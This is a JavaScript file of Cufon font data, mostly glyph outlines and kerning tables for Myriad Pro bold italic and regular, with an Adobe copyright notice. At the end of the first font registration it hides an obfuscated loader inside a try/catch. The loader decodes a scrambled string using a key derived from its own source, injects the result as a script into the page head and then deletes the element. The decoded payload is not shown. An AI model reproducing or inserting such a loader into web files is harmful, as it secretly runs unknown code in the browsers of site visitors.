6,-12,-24,-27,-24,-44xm95,-103v-35,3,-52,68,-4,69v17,0,34,-13,34,-34v0,-19,-13,-29,-30,-35xm114,-200v-17,0,-31,14,-31,30v0,15,13,24,28,29v29,-4,43,-57,3,-59"},{"d":"55,0r-48,0r46,-243r61,0r32,93v11,30,14,58,23,83v2,-52,18,-124,28,-176r48,0r-46,243r-54,0r-33,-97v-12,-32,-16,-56,-25,-84","w":239,"k":{"f":-1,"t":-1,"z":-1}},{"d":"52,-243r52,0v-9,57,-29,106,-29,168v0,20,12,35,35,35v27,0,44,-18,53,-63r27,-140r52,0v-23,100,-20,247,-139,247v-63,0,-90,-46,-77,-111","w":235,"k":{"A":6,"S":1,"f":-5,"t":-3,"x":2}},{"d":"152,-67v-27,0,-57,-32,-84,-32v-11,0,-16,13,-17,30r-34,0v0,-48,21,-67,50,-67v25,0,62,30,84,31v9,0,14,-7,15,-29r34,0v2,51,-21,67,-48,67","w":214},{"d":"89,-153v43,-6,85,22,85,65v0,81,-107,112,-169,78r13,-41v27,18,103,16,102,-27v9,-29,-46,-41,-87,-35r33,-121r126,0r-9,44r-83,0"},{"d":"52,-243r52,0r-46,243r-52,0","w":98,"k":{"f":-1,"t":-1,"z":-1}},{"d":"196,-64r-39,0r-53,-128r-53,128r-38,0r75,-170r33,0","w":214},{"d":"240,-142v-4,93,-62,146,-166,144v-29,0,-55,-3,-67,-5r45,-236v92,-16,192,0,188,97xm67,-41v72,11,117,-36,117,-101v0,-47,-37,-68,-86,-59","w":245,"k":{"T":13,"A":5,"V":3,"W":3,"X":4,"Y":16,"a":-3,"f":-5,"g":-3,"b":-1,"h":-1,"k":-1,"l":-1,"j":2,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":-3,"d":-3,"e":-3,"o":-3,"q":-3,"t":-4,"u":-1,"v":-2,"w":-2,"y":-2,"x":4,"s":-1,":":1,";":1,"-":-5,",":6,".":6}},{"d":"124,-238v50,0,67,38,67,80v0,73,-35,162,-109,162v-49,0,-68,-37,-68,-84v0,-74,38,-158,110,-158xm118,-197v-35,0,-53,85,-53,119v0,18,2,41,23,41v36,0,52,-89,52,-120v0,-16,-2,-40,-22,-40"},{"d":"19,-80r0,-31r171,-81r0,39r-129,58r129,57r0,38","w":214},{"d":"125,-52v24,0,33,-44,36,-72v-31,-9,-54,17,-54,49v0,14,6,23,18,23xm186,4r6,20v-82,36,-178,-4,-178,-100v0,-73,54,-137,135,-137v63,0,108,44,108,104v0,53,-29,86,-68,86v-18,0,-28,-11,-32,-28v-20,40,-86,39,-86,-19v0,-60,68,-104,127,-75r-11,67v-3,21,-1,31,9,31v15,1,35,-19,35,-61v0,-47,-31,-83,-86,-83v-55,0,-104,43,-104,112v0,81,78,113,145,83","w":269},{"d":"44,-176r51,0r-32,170v-6,59,-37,91,-97,78r6,-39v24,3,32,1,39,-37xm74,-198v-14,0,-25,-10,-25,-25v-2,-36,57,-41,56,-4v0,18,-14,29,-31,29","w":99,"k":{"a":1,"j":-4,")":-2,"]":-2,"}":-2,",":4,".":4}},{"d":"7,0r46,-243r51,0r-19,109v28,-39,59,-72,89,-109r64,0r-98,105r56,138r-56,0r-41,-105r-26,24r-15,81r-51,0","w":212,"k":{"A":5,"J":-4,"C":16,"G":16,"O":16,"Q":16,"U":6,"V":2,"W":2,"Y":-2,"S":3,"Z":-4,"a":8,"g":9,"c":10,"d":10,"e":10,"o":10,"q":10,"u":7,"v":12,"w":12,"y":12,"-":11,")":-5,"]":-5,"}":-5,"\"":-2,"'":-2,",":-3,".":-3}},{"d":"113,14r-36,0r-58,-261r35,0","w":121},{"d":"17,3r6,-42v50,5,95,-24,106,-59v-38,36,-107,12,-107,-46v0,-51,42,-94,95,-94v52,0,76,36,76,82v0,100,-69,166,-176,159xm102,-119v44,5,56,-77,10,-79v-36,-3,-55,78,-10,79"},{"d":"44,-234r158,0r-6,35r-129,199r-57,0r127,-190r-102,0"},{"d":"162,-198v0,49,-62,71,-65,119r-51,0v-2,-41,53,-77,63,-109v2,-25,-48,-18,-60,-7r-7,-36v31,-24,120,-24,120,33xm59,4v-17,0,-28,-13,-28,-30v0,-19,14,-36,35,-36v17,0,29,13,29,31v0,21,-15,35,-36,35","w":157},{"d":"160,-256r51,0r-35,188v-4,22,-8,47,-9,68r-47,0r2,-28v-34,52,-113,41,-113,-35v0,-68,58,-132,135,-113xm87,-38v30,0,47,-60,50,-97v-38,-22,-75,23,-74,64v0,21,9,33,24,33","w":201,"k":{"v":-1,"w":-1,"y":-1,",":4,".":4}},{"d":"193,-76v2,79,-111,86,-186,73r45,-236v59,-10,152,-12,152,52v0,32,-24,48,-49,58v23,7,38,26,38,53xm96,-203r-10,57v34,3,65,-7,65,-33v0,-24,-32,-28,-55,-24xm78,-108r-13,68v35,4,73,-3,73,-37v0,-30,-29,-32,-60,-31","w":209,"k":{"T":9,"A":2,"U":3,"V":5,"W":5,"X":4,"Y":8,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":1,"w":1,"y":1,"-":-4,",":5,".":5}},{"d":"16,-176r54,0r17,119r48,-119r55,0v-52,90,-86,229,-187,257r-12,-44v23,-9,57,-24,59,-53","w":178,"k":{"T":12,"a":8,"g":8,"j":4,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-1,"v":-6,"w":-6,"y":-6,"s":1,"-":3,",":16,".":16}},{"d":"18,-176r57,0v8,18,13,39,22,56r38,-56r60,0r-74,86r41,90r-57,0v-9,-19,-14,-42,-24,-60v-9,18,-26,43,-39,60r-59,0r76,-91","w":179,"k":{"T":11,"a":6,"f":-2,"g":6,"c":6,"d":6,"e":6,"o":6,"q":6,"t":-7,"v":-8,"w":-8,"y":-8,"-":2}},{"d":"7,0r46,-243r52,0r-38,198r94,0r-9,45r-145,0","w":175,"k":{"T":35,"A":-5,"J":-3,"C":15,"G":15,"O":15,"Q":15,"U":14,"V":23,"W":23,"X":1,"Y":35,"M":-1,"Z":-3,"g":1,"j":-2,"c":5,"d":5,"e":5,"o":5,"q":5,"u":3,"v":16,"w":16,"y":16,"x":-3,"z":-3,"-":8,"\"":48,"'":48}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+344-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("[.(IKS&iM^?P[{ZreSN)3.3?aj&I(S?PajC)M^1U(mbT~yiq^kiika&F~m&q:i?)G9i?kUeS3N(iHikPK.;WAN%IH5;-H{NjMmBqa{?I=NLYaj-%A^eG1qTQKq~%MiH>C5CB1jIK9qfx3iLj2@>M2ZIk(9ma2XumAFmCa#GBgX;Q9I%f2tfc(XCu:XBq=U&BK.Zi[{3q[9%>gt0Tf5Iq=U0TK5IB=S%ZKSeiM{%Ug^3P(quUK|ZBM|H?:@irM^~x~quWMyiWaqLc2Ue@eIBP[tbxgy>TKj&0;{5XN.|3C[=H&2gG19tkm^a~(MKfe:AL-qF#ZSUx>Q4T+PWB%)yiIj@suVrb?Yc-K.-Wf@1b~SmTK.NqKj?q~^CZa{uFKji>C{?>=U1Zf@GxK.?F~a1>KjsPM.?ye.u-K^k>[^(WfqLrMt%T2)T4M9ZU^j&KMmIega;KMmI?[9L>")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":194,"face":{"font-family":"myriadpro","font-weight":700,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 3 3 4 3 9 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-34 -270 335 90","underline-thickness":"18","underline-position":"-18","slope":"-11","stemh":"40","stemv":"55","unicode-range":"U+0020-U+007E"}}));
;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1992-1997 Adobe Systems Incorporated.  All Rights Reserved.
 * 
 * Trademark:
 * Myriad is a trademark of Adobe Systems Incorporated.
 * 
 * Description:
 * Myriad is an Adobe Originals typeface designed by Robert Slimbach and Carol
 * Twombly in 1992. Myriad is a sans serif design that works well as a text face as
 * well as providing flexibility for filling display needs. Myriad Web has been
 * optimized for onscreen use.
 * 
 * Manufacturer:
 * Adobe Systems Incorporated
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"127,14r-25,0r-101,-261r26,0","w":127},{"w":78,"k":{"Y":17,"W":13,"V":13,"T":15}},{"d":"104,-178v51,0,88,39,88,89v-1,56,-35,92,-90,93v-50,1,-88,-38,-88,-90v0,-54,38,-92,90,-92xm103,-153v-34,0,-55,31,-55,66v0,36,22,66,54,66v34,0,55,-31,55,-67v0,-33,-20,-65,-54,-65","w":205,"k":{"z":5,"y":3,"x":5,"w":3,"v":3,".":9,",":10}},{"d":"-17,50v45,-3,49,-27,48,-79r0,-145r34,0v-9,98,37,252,-78,250xm48,-248v12,0,21,8,21,21v0,13,-9,21,-21,21v-12,0,-21,-9,-21,-21v0,-12,9,-21,21,-21","w":91,"k":{".":3,",":5}},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"135,-193v0,50,-60,62,-53,123r-30,0v-12,-55,45,-75,48,-119v2,-36,-51,-36,-72,-19r-10,-23v38,-29,117,-18,117,38xm67,-43v14,0,22,10,22,24v0,14,-9,23,-22,23v-12,0,-23,-10,-23,-23v1,-14,9,-24,23,-24","w":151},{"d":"102,-151v-22,-1,-42,24,-42,47r0,104r-33,0r-1,-174r29,0r2,28v20,-44,95,-42,108,3v32,-61,119,-39,119,42r0,101r-32,0v-5,-58,19,-151,-39,-151v-60,0,-37,92,-41,151r-33,0v-5,-57,20,-148,-37,-151","w":309,"k":{"y":5,"v":7}},{"d":"104,0r-36,0r-63,-243r36,0r48,206v10,-55,37,-146,52,-206r36,0r48,205v11,-62,36,-142,52,-205r34,0r-71,243r-35,0r-31,-126v-10,-37,-12,-65,-17,-79v-9,56,-37,146,-53,205","w":313,"k":{"}":-23,"u":6,"t":-4,"r":6,"o":13,"m":6,"e":13,"d":12,"a":12,"]":-27,"T":-13,"A":21,";":8,":":6,".":20,",":22,")":-23}},{"d":"67,-58v-4,31,18,38,43,32r2,25v-41,14,-78,-1,-78,-55r0,-93r-28,0r0,-25r28,0r0,-33r33,-9r0,42r46,0r0,25r-46,0r0,91","w":123,"k":{"y":-3,"o":2,"g":2,"e":2,"d":2,"c":2,",":3}},{"d":"118,0r-34,0r0,-103r-79,-140r38,0r60,117v4,-9,24,-49,61,-117r38,0r-84,140r0,103","w":202,"k":{"}":-23,"v":11,"u":20,"t":8,"q":27,"o":27,"l":4,"i":5,"e":27,"d":27,"a":26,"]":-27,"Y":-9,"X":-3,"W":-10,"V":-12,"T":-17,"S":5,"Q":14,"O":14,"G":14,"C":14,"A":36,";":14,":":12,".":35,",":36,")":-24}},{"d":"6,-29v42,15,74,-4,74,-56r0,-158r33,0v-3,111,32,286,-112,241","w":138,"k":{"}":-17,"y":-4,"]":-17,")":-17}},{"d":"26,-162v50,-32,128,-18,128,57v0,34,-2,77,3,105r-30,0r-4,-22v-25,42,-112,31,-110,-24v2,-51,49,-65,108,-65v5,-50,-58,-51,-88,-29xm77,-21v34,0,51,-27,45,-67v-44,0,-75,5,-75,38v0,18,12,29,30,29","w":179,"k":{"y":4,"w":3,"v":5}},{"d":"199,-90v9,82,-100,129,-143,61r-1,29r-29,0r1,-256r34,0r0,110v38,-64,148,-24,138,56xm112,-152v-38,1,-52,34,-52,81v0,25,24,48,51,48v36,0,54,-28,54,-65v0,-36,-20,-65,-53,-64","w":212,"k":{"y":3,"v":3,".":11,",":13}},{"d":"28,0r0,-243r33,0r0,215r107,0r0,28r-140,0","w":176,"k":{"y":10,"w":11,"u":5,"o":5,"e":5,"Y":35,"W":22,"V":26,"U":13,"T":33,"Q":14,"O":14,"G":14,"C":14}},{"d":"28,-243r33,0r0,243r-33,0r0,-243","w":88,"k":{"z":-4,"y":-3,"x":-2,"w":-4,"v":-4,"t":-6,"l":-4,"k":-4,"j":-3,"i":-4,"h":-4,"f":-3}},{"d":"7,-247r68,0r0,287r-68,0r0,-20r42,0r0,-246r-42,0r0,-21","w":104},{"d":"76,0r0,-215r-76,0r0,-28r187,0r0,28r-77,0r0,215r-34,0","w":186,"k":{"}":-25,"z":14,"y":15,"w":14,"u":16,"s":19,"r":16,"o":24,"m":16,"i":-2,"h":3,"e":24,"a":22,"]":-29,"Y":-14,"X":-8,"W":-15,"V":-17,"T":-14,"S":2,"Q":10,"O":10,"G":10,"C":10,"A":28,";":12,":":10,".":22,",":23,")":-25}},{"d":"28,0r0,-243r34,0r0,117v6,-9,38,-48,96,-117r42,0r-91,103r98,140r-40,0r-82,-118r-24,27r0,91r-33,0","w":202,"k":{"y":9,"w":7,"v":10,"u":2,"r":-4,"n":-4,"l":-3,"i":-4,"h":-3,"a":-6,"W":-6,"Q":8,"O":8,"G":8,"C":8,"A":-4}},{"d":"246,-124v0,59,-30,99,-72,117v27,7,51,12,73,16r-10,27v-38,-8,-75,-22,-112,-32v-65,-2,-112,-53,-112,-122v0,-72,47,-129,118,-129v68,0,115,54,115,123xm130,-220v-51,0,-81,47,-81,100v0,51,31,97,80,97v50,1,81,-46,81,-99v0,-51,-31,-99,-80,-98","w":258,"k":{"Y":12,"X":9,"T":9,"A":4}},{"d":"32,-270r25,0r0,360r-25,0r0,-360","w":88},{"d":"60,0r-33,0r0,-174r33,0r0,174xm44,-248v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-22,-9,-22,-21v0,-12,10,-21,22,-21","w":87},{"d":"49,-121v0,74,71,113,140,89r0,-70r-51,0r0,-26r83,0r0,116v-97,41,-208,-3,-208,-108v0,-98,106,-150,201,-114r-8,27v-72,-29,-157,5,-157,86","w":242,"k":{"o":-2,"e":-4,"a":-3}},{"d":"60,-256r1,161r68,-79r41,0r-70,71r80,103r-41,0r-62,-83r-17,18r0,65r-33,0r0,-256r33,0","w":175,"k":{"y":-7,"w":-5,"r":-6,"p":-7,"n":-7,"m":-7,"l":-7,"i":-7,"h":-7,"e":-3,"b":-7,"a":-6}},{"d":"49,-120v0,80,80,116,150,85r6,27v-87,36,-192,-11,-192,-111v0,-96,101,-155,193,-116r-8,27v-70,-32,-149,7,-149,88","w":217,"k":{"y":7,"u":4,"o":5,"e":4,"a":3,"Q":9,"O":9,"G":9,"C":9}},{"d":"106,-150v-23,-1,-46,21,-46,46r0,104r-33,0r0,-256r33,0r1,109v30,-53,120,-34,120,45r0,102r-33,0v-5,-59,20,-150,-42,-150","w":206,"k":{"y":5,"v":7}},{"d":"118,4v-61,0,-90,-40,-90,-106r0,-141r33,0v7,85,-28,220,59,220v90,0,54,-135,61,-220r33,0r0,140v1,67,-34,107,-96,107","w":241,"k":{"z":2,"x":3,"t":-2,"s":3,"f":-3,"A":13}},{"d":"35,0r10,-70r-31,0r0,-23r34,0r7,-50r-32,0r0,-23r35,0r9,-68r23,0r-10,68r39,0r9,-68r22,0r-9,68r30,0r0,23r-33,0r-7,50r32,0r0,23r-35,0r-10,70r-22,0r9,-70r-38,0r-9,70r-23,0xm71,-93r38,0r6,-50r-38,0","w":185},{"d":"18,-249r33,0r-6,87r-21,0xm73,-249r34,0r-7,87r-20,0","w":124},{"d":"183,-173v0,61,-61,89,-122,76r0,97r-33,0r0,-240v68,-13,155,-5,155,67xm150,-172v0,-43,-48,-53,-89,-44r0,92v41,10,89,-4,89,-48","w":198,"k":{"u":5,"t":-2,"s":8,"r":6,"o":9,"n":6,"l":2,"i":2,"h":2,"e":9,"a":9,"A":34,";":4,".":51,",":52}},{"d":"156,-73v-28,1,-77,-33,-96,-32v-14,0,-20,10,-21,30r-23,0v0,-33,15,-55,44,-56v29,-1,74,32,96,32v13,0,20,-11,20,-31r22,0v1,36,-11,55,-42,57","w":214},{"w":78,"k":{"Y":17,"W":13,"V":13,"T":15}},{"d":"6,-174r35,0r37,143v1,-9,17,-57,45,-143r28,0r44,143v10,-50,26,-96,39,-143r33,0r-57,174r-31,0r-43,-139v-11,47,-30,94,-45,139r-31,0","w":272,"k":{"y":-4,"v":-3,"q":3,"o":3,"e":3,"d":3,"c":3,"a":1,";":-9,":":-12,".":14,",":16}},{"d":"14,51v27,-8,67,-39,56,-65r-67,-160r37,0r51,137r47,-137r36,0r-49,124v-31,73,-40,107,-103,130","w":176,"k":{"w":-3,"v":-5,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,";":-9,":":-11,".":18,",":20}},{"d":"205,0r-39,0v-39,-65,-59,-99,-61,-101r-57,101r-39,0r77,-123r-74,-120r39,0v34,60,53,92,56,98v1,-2,20,-35,57,-98r39,0r-76,119","w":214,"k":{"y":7,"u":3,"i":2,"e":4,"a":2,"X":3,"W":-3,"V":-3,"T":-3,"Q":13,"O":13,"G":13,"C":13}},{"d":"29,42r-24,2v10,-27,17,-56,22,-87r37,-4v-10,37,-22,67,-35,89","w":76,"k":{" ":25}},{"d":"27,0r0,-256r33,0r0,256r-33,0","w":87},{"d":"11,0r0,-19r139,-196r-127,0r0,-28r171,0r0,20r-138,195r140,0r0,28r-185,0","w":208,"k":{"y":4,"w":5,"u":3,"o":4,"e":3,"Q":8,"O":8,"G":8,"C":8}},{"d":"11,-110r90,0r0,25r-90,0r0,-25","w":111},{"d":"14,-84v-11,-82,96,-127,138,-64r1,-26r32,0r-1,245r-34,0r0,-99v-38,64,-145,22,-136,-56xm100,-23v40,-1,50,-34,50,-80v0,-27,-22,-49,-48,-49v-34,0,-54,28,-54,66v0,35,18,64,52,63","w":210,"k":{".":8,",":4}},{"d":"5,-174r36,0r50,141r50,-141r36,0r-71,174r-33,0","w":180,"k":{"y":-4,"w":-3,"s":3,"q":4,"o":4,"e":4,"d":4,"c":4,"a":5,";":-9,":":-12,".":15,",":18}},{"d":"97,40r-67,0r0,-287r67,0r0,21r-42,0r0,246r42,0r0,20","w":104,"k":{"Y":-22,"W":-25,"V":-25,"T":-29,"J":-9}},{"d":"159,-140r0,27r-98,0r0,85r109,0r0,28r-142,0r0,-243r137,0r0,28r-104,0r0,75r98,0","w":183,"k":{"y":3,"w":3,"v":3,"u":2,"t":2,"g":2,"e":2,"d":2,"c":2,"W":-3,"V":-3,",":3}},{"d":"149,0r-32,0r0,-63r-111,0r0,-22r106,-149r37,0r0,145r34,0r0,26r-34,0r0,63xm117,-89r0,-114v-25,50,-49,71,-77,113"},{"d":"199,-90v10,81,-95,125,-139,66r0,95r-33,0r-1,-245r29,0v2,9,0,22,3,30v39,-66,150,-27,141,54xm112,-152v-39,2,-52,35,-52,80v0,27,24,51,51,50v35,0,54,-30,54,-67v0,-34,-20,-64,-53,-63","w":212,"k":{"z":3,"y":2,".":9,",":10}},{"d":"7,0r0,-19r104,-129r-97,0r0,-26r138,0r0,20r-103,127r105,0r0,27r-147,0","w":159,"k":{"y":-9,"o":3,"e":3,"d":3,"c":3}},{"d":"164,-68v-3,33,-25,58,-59,62r0,37r-24,0r0,-36v-23,-1,-42,-6,-57,-16r9,-26v29,22,97,25,97,-18v0,-57,-107,-40,-103,-105v2,-33,25,-54,57,-59r0,-36r23,0r0,35v18,1,35,5,49,13r-9,25v-28,-18,-86,-20,-87,18v10,52,109,38,104,106"},{"d":"131,-247v68,0,115,54,115,123v0,73,-48,127,-118,128v-69,1,-115,-54,-115,-123v0,-72,49,-128,118,-128xm129,-220v-51,0,-81,47,-81,100v0,50,32,97,81,97v50,0,81,-46,81,-99v0,-51,-32,-99,-81,-98","w":258,"k":{"y":-5,"x":2,"w":-5,"v":-5,"t":-6,"q":-2,"o":-3,"j":-2,"g":-2,"f":-6,"e":-2,"d":-2,"c":-2,"Y":11,"X":12,"W":-2,"T":10,"A":7,".":10,",":12}},{"d":"98,-238v94,0,98,148,46,202v-24,25,-59,40,-108,40r0,-28v58,5,100,-30,107,-84v-37,50,-128,22,-128,-46v0,-46,37,-84,83,-84xm48,-156v0,58,92,62,96,13v3,-38,-14,-69,-49,-69v-28,-1,-47,27,-47,56"},{"d":"133,-49v0,53,-76,65,-118,41r8,-26v29,26,99,10,70,-30v-22,-15,-81,-30,-73,-62v-3,-49,69,-65,107,-41r-9,24v-21,-15,-64,-18,-66,13v9,39,81,28,81,81","w":147,"k":{".":3,",":5}},{"d":"55,-71r-25,0r-6,-172r36,0xm42,-43v14,0,23,10,23,24v0,14,-10,23,-23,23v-12,0,-22,-9,-22,-23v0,-14,9,-23,22,-24","w":84},{"d":"95,0r0,-85r-80,0r0,-23r80,0r0,-84r25,0r0,84r80,0r0,23r-80,0r0,85r-25,0","w":214},{"d":"87,0r-1,-203r-41,22r-6,-26v26,-10,41,-31,81,-27r0,234r-33,0"},{"d":"98,4v-87,0,-105,-118,-64,-182v24,-38,67,-59,120,-60r1,28v-61,-1,-100,32,-107,82v39,-53,131,-24,131,49v0,45,-34,83,-81,83xm145,-77v0,-66,-99,-67,-99,-10v0,35,17,65,52,65v29,0,47,-25,47,-55"},{"d":"167,-66v0,69,-100,88,-151,53r8,-25v37,25,108,21,108,-29v-1,-37,-37,-50,-80,-46r0,-25v36,3,72,-7,72,-38v0,-44,-62,-42,-91,-19r-9,-24v42,-32,136,-25,134,37v0,26,-14,45,-44,56v29,5,53,27,53,60"},{"d":"25,14r-25,0r101,-261r26,0","w":126},{"d":"41,-43v15,0,23,9,23,24v-1,13,-10,23,-23,23v-12,0,-22,-9,-22,-23v0,-14,9,-23,22,-24","w":76,"k":{" ":26}},{"d":"8,43v60,-80,60,-213,0,-293r25,0v64,78,64,214,0,293r-25,0","w":104},{"d":"59,0r-31,0r0,-243r37,0r80,122v18,27,33,53,45,78v-5,-45,-4,-140,-4,-200r32,0r0,243r-34,0r-79,-122v-20,-31,-36,-57,-48,-81","w":245},{"d":"67,-94v-35,0,-56,-32,-56,-71v0,-41,21,-72,58,-73v38,0,57,29,57,70v0,42,-22,74,-59,74xm69,-114v41,-1,42,-104,0,-104v-22,0,-32,26,-31,52v1,26,8,51,31,52xm87,4r-20,0r138,-242r21,0xm224,3v-35,0,-56,-32,-56,-71v0,-41,21,-72,58,-73v37,0,57,29,57,69v1,43,-22,75,-59,75xm226,-17v41,-1,42,-104,0,-104v-42,0,-43,104,0,104","w":293},{"d":"11,-170r0,-25r54,6r-34,-45r23,-13r22,51r23,-51r22,13r-35,46r55,-7r0,25r-55,-6r35,44r-23,13r-23,-51r-23,51r-21,-13r35,-45","w":152},{"d":"14,-121r0,-23r186,0r0,23r-186,0xm14,-50r0,-22r186,0r0,22r-186,0","w":214},{"d":"237,-127v0,107,-96,142,-209,126r0,-238v106,-21,209,7,209,112xm201,-126v0,-76,-65,-105,-140,-89r0,189v77,12,140,-22,140,-100","w":249,"k":{"y":-9,"o":-2,"e":-2,"Y":9,"W":-3,".":12,",":13}},{"d":"28,-243r33,0r0,101r122,0r0,-101r33,0r0,243r-33,0r0,-113r-122,0r0,113r-33,0r0,-243","w":243},{"d":"245,0r-11,-211v-21,70,-50,141,-75,209r-25,0v-30,-86,-48,-138,-53,-154v-5,-16,-10,-34,-16,-55r-12,211r-31,0r17,-243r43,0v30,84,48,133,52,147r15,51v19,-73,47,-132,71,-198r43,0r15,243r-33,0","w":299,"k":{"y":-3,"o":-2,"n":-4,"j":-4,"i":-5,"e":-2,"d":-2,"c":-2,"a":-2}},{"d":"95,40v-69,8,-55,-54,-55,-107v0,-18,-10,-27,-30,-27r0,-19v46,3,25,-53,24,-86v-1,-35,25,-50,61,-48r0,21v-74,-7,5,108,-56,122v61,8,-20,125,56,124r0,20","w":104,"k":{"Y":-18,"W":-21,"V":-21,"T":-25,"J":-9}},{"d":"165,-169v-7,72,-38,79,-101,141r107,0r0,28r-154,0r0,-21v54,-49,86,-83,98,-98v27,-35,22,-93,-30,-91v-17,0,-35,6,-52,20r-11,-23v46,-44,150,-29,143,44"},{"d":"95,4v-44,0,-81,-24,-81,-64v0,-28,15,-49,46,-62v-68,-28,-32,-116,38,-116v71,0,97,87,32,113v26,11,46,28,47,60v1,42,-38,69,-82,69xm97,-214v-23,0,-42,15,-42,37v0,21,16,35,46,42v50,-9,47,-80,-4,-79xm90,-111v-20,7,-41,19,-41,48v0,25,21,42,47,42v26,0,48,-16,48,-40v0,-32,-28,-44,-54,-50"},{"d":"132,-73v0,-48,-53,-56,-102,-49r15,-112r116,0r0,28r-92,0r-9,57v59,-7,106,19,107,73v2,70,-93,101,-151,65r8,-25v39,24,108,15,108,-37"},{"d":"23,0r0,-26r142,-70r-142,-70r0,-26r168,85r0,22","w":214},{"d":"183,-178v-1,31,-19,53,-46,61v34,1,46,108,55,117r-35,0v-6,-5,-16,-84,-33,-94v-13,-13,-38,-10,-63,-10r0,104r-33,0r0,-239v65,-14,158,-9,155,61xm150,-175v0,-43,-50,-50,-89,-41r0,86v46,3,89,-3,89,-45","w":200,"k":{"y":-5,"t":-7,"i":-4,"h":-4,"a":-4,"Y":4,"X":-2,"W":-9,"V":-6,"T":-3,"A":-2}},{"d":"71,43v-64,-78,-64,-214,0,-293r26,0v-61,78,-61,213,0,293r-26,0","w":104,"k":{"Y":-18,"W":-21,"V":-21,"T":-25,"J":-9}},{"d":"71,-199v0,33,-22,89,23,86r0,19v-45,-1,-23,53,-23,85v1,36,-22,51,-62,49r0,-20v74,7,-5,-111,57,-124v-63,-8,21,-125,-57,-122r0,-21v37,-2,62,14,62,48","w":104},{"d":"18,-249r33,0r-6,87r-21,0","w":68},{"d":"14,-86v-9,-78,97,-126,138,-62r2,-26r29,0r-1,148v12,96,-87,122,-153,86r8,-25v49,32,130,11,111,-66v-39,62,-143,19,-134,-55xm100,-26v36,-1,48,-33,48,-78v0,-26,-20,-49,-47,-48v-33,0,-53,29,-53,65v0,34,20,61,52,61","w":208,"k":{"p":2,"f":-2,".":8,",":9}},{"d":"5,-174r38,0v28,41,43,63,44,65v6,-10,20,-32,43,-65r37,0r-61,84r63,90r-38,0v-24,-34,-40,-57,-47,-69v-3,6,-17,29,-44,69r-37,0r64,-89","w":173,"k":{"y":-5,"w":-5,"v":-3,"t":-5,"s":2,"q":6,"o":6,"e":6,"d":6,"c":6}},{"d":"158,-76r-89,0r-25,76r-35,0r85,-243r41,0r86,243r-36,0xm76,-102r75,0v-22,-61,-34,-98,-38,-112v-5,20,-18,57,-37,112","w":228,"k":{"z":-6,"y":8,"w":8,"v":13,"u":5,"t":4,"s":3,"q":4,"o":4,"g":5,"f":3,"e":4,"d":5,"c":5,"Y":33,"W":20,"V":26,"U":11,"T":30,"Q":5,"O":5,"G":5,"C":5}},{"d":"28,0r0,-243r136,0r0,28r-103,0r0,79r95,0r0,27r-95,0r0,109r-33,0","w":182,"k":{"y":8,"u":13,"r":10,"o":11,"l":6,"i":10,"e":12,"a":17,"A":29,";":7,":":5,".":36,",":38}},{"d":"59,-79v-9,76,86,65,86,10r0,-105r34,0r1,174r-30,0r-2,-30v-31,59,-122,37,-122,-43r0,-101r33,0r0,95","w":205,"k":{".":3,",":5}},{"d":"41,-169v14,0,23,10,23,24v0,13,-10,23,-23,23v-13,0,-22,-9,-22,-23v0,-14,9,-23,22,-24xm41,-43v14,0,22,10,22,24v0,14,-10,23,-22,23v-12,0,-22,-9,-22,-23v0,-14,9,-23,22,-24","w":76,"k":{" ":24}},{"d":"187,-69v-1,68,-81,78,-159,68r0,-238v59,-13,152,-10,149,55v-1,28,-18,46,-41,54v28,7,51,29,51,61xm61,-140v42,3,79,-4,83,-40v4,-36,-46,-44,-83,-37r0,77xm152,-70v-1,-42,-44,-49,-91,-46r0,91v42,5,92,-3,91,-45","w":201,"k":{"T":4,".":6,",":6}},{"d":"159,-194v0,36,-26,49,-54,65r59,66v11,-16,19,-39,24,-70r31,0v-7,41,-19,71,-36,90r41,43r-40,0r-23,-23v-45,47,-151,32,-150,-41v0,-30,16,-54,49,-72v-42,-42,-16,-111,43,-111v32,-1,56,23,56,53xm102,-224v-38,2,-39,52,-13,77v23,-13,41,-19,41,-46v0,-17,-11,-31,-28,-31xm75,-118v-48,23,-37,97,19,97v20,0,36,-7,50,-21v-28,-29,-28,-30,-69,-76","w":224},{"d":"121,0r-38,0r-82,-243r36,0r67,210v16,-62,49,-146,71,-210r35,0","w":208,"k":{"}":-23,"y":1,"u":7,"r":7,"o":14,"i":-5,"e":14,"a":13,"]":-27,"S":-2,"A":27,";":10,":":8,".":24,",":25,")":-23}},{"d":"168,-67v0,71,-97,87,-153,55r9,-28v35,23,110,26,110,-24v0,-65,-113,-41,-113,-116v0,-62,87,-83,137,-54r-9,27v-30,-19,-95,-18,-95,23v0,61,114,41,114,117","w":184,"k":{"y":3,"w":3,"v":4,"q":-2,"j":2,"e":-2}},{"d":"106,-150v-24,-1,-47,21,-46,46r0,104r-33,0r-1,-174r29,0r3,29v28,-55,123,-37,123,43r0,102r-33,0v-5,-59,20,-150,-42,-150","w":206,"k":{"y":5,"v":7}},{"d":"7,-248r36,0r32,52r-24,0","w":108},{"d":"44,-169v14,0,22,10,22,24v1,14,-9,23,-22,23v-13,0,-22,-9,-22,-23v0,-14,9,-24,22,-24xm29,42r-23,2v10,-27,17,-56,22,-87r36,-4v-11,37,-22,67,-35,89","w":76,"k":{" 